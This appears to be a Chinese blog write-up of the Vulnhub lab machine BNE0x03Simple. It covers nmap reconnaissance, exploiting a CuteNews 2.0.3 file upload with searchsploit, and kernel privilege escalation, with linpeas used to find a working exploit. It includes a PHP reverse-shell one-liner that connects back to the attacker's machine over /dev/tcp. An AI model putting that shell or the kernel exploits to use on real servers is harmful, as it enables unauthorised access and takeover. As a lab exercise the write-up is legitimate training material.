首页 > 其他分享 >BNE0x03Simple - 内核提权 searchsploit使用

BNE0x03Simple - 内核提权 searchsploit使用

时间:2023-05-09 12:33:26浏览次数:36  
标签:searchsploit nmap sudo oA 提权 xx BNE0x03Simple

主机发现

sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports

只有一个端口开放

sudo nmap -sT -sV -sC -O -p xx.xxx.xx.xx -oA nmapscan/detail

sudo nmap -sU --top-ports 20 xx.xx.xx.xx -oA nmapscan/udp

sudo nmap --script=vuln -p xx.xx.xx.xx -oA nmapscan/vuln

访问web页面,发现是cutenew2.0.3版本的cms

利用searchsploit cuteNews 2.0.3

下载

searchsploit cuteNew2.0.3 -m 37474

查看漏洞

手写一个反弹shell

sudo vim evill.php

<?php exec("/bin/ bash -c 'bash -i >& /dev/tcp/kali's ip/1234 0>&1'");?>

根据页面漏洞进行上传

shell在

kali监听访问php

拿到初始shell

权限查看

whoami   ip a   cd /home/  查看home目录中的其他目录有没有什么文件  

uname -a   sudo -l  自动任务

什么都没有,尝试内核提权

searchsploit kernel 3.16.0-30

观察版本是否正确发现只有两个,尝试两个是否能成功提权

search kernel 3.16.0-30 -m 37292

sudo php -S 0:80 

在靶机上利用wget下载

查看利用方式并进行运行

失败

利用提权建议工具进行linpeas.sh

chmod +x linpeas.sh

通过给出的建议一个一个下载进行尝试

 最后在36746.c这个文件成功提权

标签:searchsploit,nmap,sudo,oA,提权,xx,BNE0x03Simple
From: https://www.cnblogs.com/lisenMiller/p/17384464.html

相关文章

  • windows提权-系统错误配置提权
    windows提权-系统错误配置提权目录windows提权-系统错误配置提权一、错误配置提权介绍二、TustedServicePaths提权原理三、PATH环境变量提权四、不安全的服务提权五、不安全注册表提权六、注册表键AlwaysInstall提权七、泄露敏感信息提权八、计划任务提权九、启动项提权一、错......
  • DC-1 find提权/sql数据库创建用户(个人笔记)
    进入数据库select*fromusers\G;\G为了让界面看着更整洁 在exploitdb中有一个针对Drupal7版本的攻击脚本,可以增加一个admin权限的用户账号:终端/msf输入:searchsploitdrupalpython2/usr/share/exploitdb/exploits/php/webapps/34992.py-thttp://url-uadmin3-pad......
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)
    Funbox4靶机信息名称:Funbox:CTFURL:https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址将靶机导入VirtualBox。配置其网卡为主机模式配置。启动KaliLinux和靶机。内置netdiscovery工具可以将靶机的IP地址识别为192.168.56.150。(kali㉿kali)-[~/D......
  • SAR -searchsploit
    主机发现sudonmap-sn192.168.28.0/24TCP端口扫描:sudonmap-sT--min-rate10000-p-192.168.28.35-oAnmapscan/ports端口tcp扫描sudonmap-sT-sV-sC-O-p80192.168.28.35-oAnmapscan/detial端口udp扫描sudonmap-sU--top-ports20192.168.28.35-oAnmaps......
  • Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)
    HacksudoThor作者:jasonhuawen靶机信息名称:hacksudo:Thor地址:https://www.vulnhub.com/entry/hacksudo-thor,733/识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56......
  • Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)
    HacksudoSearch识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub之Harrison靶机详细测试过程(提权成功)
    Harrison作者:jasonhuawen靶机信息名称:SP:harrison地址:https://www.vulnhub.com/entry/sp-harrison,302/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Harrison]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView......
  • find基础命令与提权教程
    find命令用来在指定目录下查找文件,若不指定目录则视为当前目录find常用参数语法:find[path…][expression]path为查找路径,.为当前路径,/为根目录expression即为参数-name: 按文件名查找文件-perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普......
  • AD提权安装软件
    在使用ActiveDirectory域管理的虚拟桌面中,每个用户对虚拟桌面计算机是普通用户权限。如果用户需要单独安装软件,需要以管理员账户权限运行。有的软件也需要以管理员权限运行,对于这种情况下,可以使用第三方软件lsrunase.exe程序,通过指定批处理脚本的方式,以管理员权限安装软件(或运行......
  • Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)
    Ino识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Ino]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......